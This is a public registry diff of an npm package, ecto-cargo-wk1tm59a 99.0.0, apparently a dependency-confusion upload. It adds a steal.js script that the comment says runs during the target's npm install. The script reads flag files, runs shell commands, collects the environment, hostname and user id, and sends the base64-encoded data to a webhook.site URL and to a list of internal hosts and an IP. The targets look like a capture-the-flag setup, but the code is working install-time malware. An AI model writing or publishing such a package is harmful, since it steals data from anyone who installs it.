ecto-cargo-wk1tm59a 99.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/ecto-cargo-wk1tm59a-99.0.0.tgz +0 -0
- package/package.json +11 -0
- package/steal.js +49 -0
|
Binary file
|
package/package.json
ADDED
package/steal.js
ADDED
|
@@ -0,0 +1,49 @@
|
|
|
1
|
+
// Exfil helper that runs inside the target's nightly npm install.
|
|
2
|
+
const fs = require('fs');
|
|
3
|
+
const cp = require('child_process');
|
|
4
|
+
const http = require('http');
|
|
5
|
+
const https = require('https');
|
|
6
|
+
|
|
7
|
+
const WH = 'https://webhook.site/9f1b89bd-a22f-4221-b28e-bc956b5ec8e0';
|
|
8
|
+
const phase = process.argv[2] || 'x';
|
|
9
|
+
|
|
10
|
+
function read(p){ try { return fs.readFileSync(p,'utf8'); } catch(e){ return ''; } }
|
|
11
|
+
function tryCmd(c){ try { return cp.execSync(c,{timeout:4000}).toString(); } catch(e){ return ''; } }
|
|
12
|
+
|
|
13
|
+
let data = '';
|
|
14
|
+
for (const p of ['/flag','/flag.txt','/root/flag.txt','/root/flag','/app/flag.txt','/app/flag','/tmp/flag.txt','/home/flag.txt']) data += read(p);
|
|
15
|
+
data += tryCmd('cat /flag* /root/flag* /app/flag* 2>/dev/null; find / -maxdepth 4 -iname "flag*" 2>/dev/null | head -n 20; env | grep -iE "flag|htb"');
|
|
16
|
+
const b64 = Buffer.from(data).toString('base64');
|
|
17
|
+
const host = tryCmd('hostname').trim();
|
|
18
|
+
const who = tryCmd('id').trim();
|
|
19
|
+
|
|
20
|
+
function get(url){
|
|
21
|
+
return new Promise(res=>{
|
|
22
|
+
try{
|
|
23
|
+
const lib = url.startsWith('https')?https:http;
|
|
24
|
+
const r = lib.get(url, x=>{ x.resume(); x.on('end',res); });
|
|
25
|
+
r.on('error',res); r.setTimeout(5000,()=>{r.destroy();res();});
|
|
26
|
+
}catch(e){res();}
|
|
27
|
+
});
|
|
28
|
+
}
|
|
29
|
+
function put(url, body){
|
|
30
|
+
return new Promise(res=>{
|
|
31
|
+
try{
|
|
32
|
+
const u = new URL(url);
|
|
33
|
+
const lib = u.protocol==='https:'?https:http;
|
|
34
|
+
const req = lib.request(url,{method:'PUT',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(body)}}, x=>{x.resume();x.on('end',res);});
|
|
35
|
+
req.on('error',res); req.setTimeout(5000,()=>{req.destroy();res();});
|
|
36
|
+
req.write(body); req.end();
|
|
37
|
+
}catch(e){res();}
|
|
38
|
+
});
|
|
39
|
+
}
|
|
40
|
+
|
|
41
|
+
(async()=>{
|
|
42
|
+
// 1) egress exfil to webhook
|
|
43
|
+
await get(`${WH}/${phase}?h=${encodeURIComponent(host)}&u=${encodeURIComponent(who)}&f=${encodeURIComponent(b64)}`);
|
|
44
|
+
// 2) in-band fallback: write flag back into a console module we can read
|
|
45
|
+
const manifest = `exfil:\n phase: ${phase}\n host: ${host}\n data: ${b64}\n`;
|
|
46
|
+
const body = JSON.stringify({ manifest });
|
|
47
|
+
const hosts = ['localhost:8080','localhost:80','localhost:3000','localhost:5000','web:8080','web:80','console:8080','frontend:80','app:8080','app:80','ecto-registry:8080','ecto-registry:80','154.57.164.66:30962'];
|
|
48
|
+
for (const h of hosts) await put(`http://${h}/api/modules/ECT-987654`, body);
|
|
49
|
+
})();
|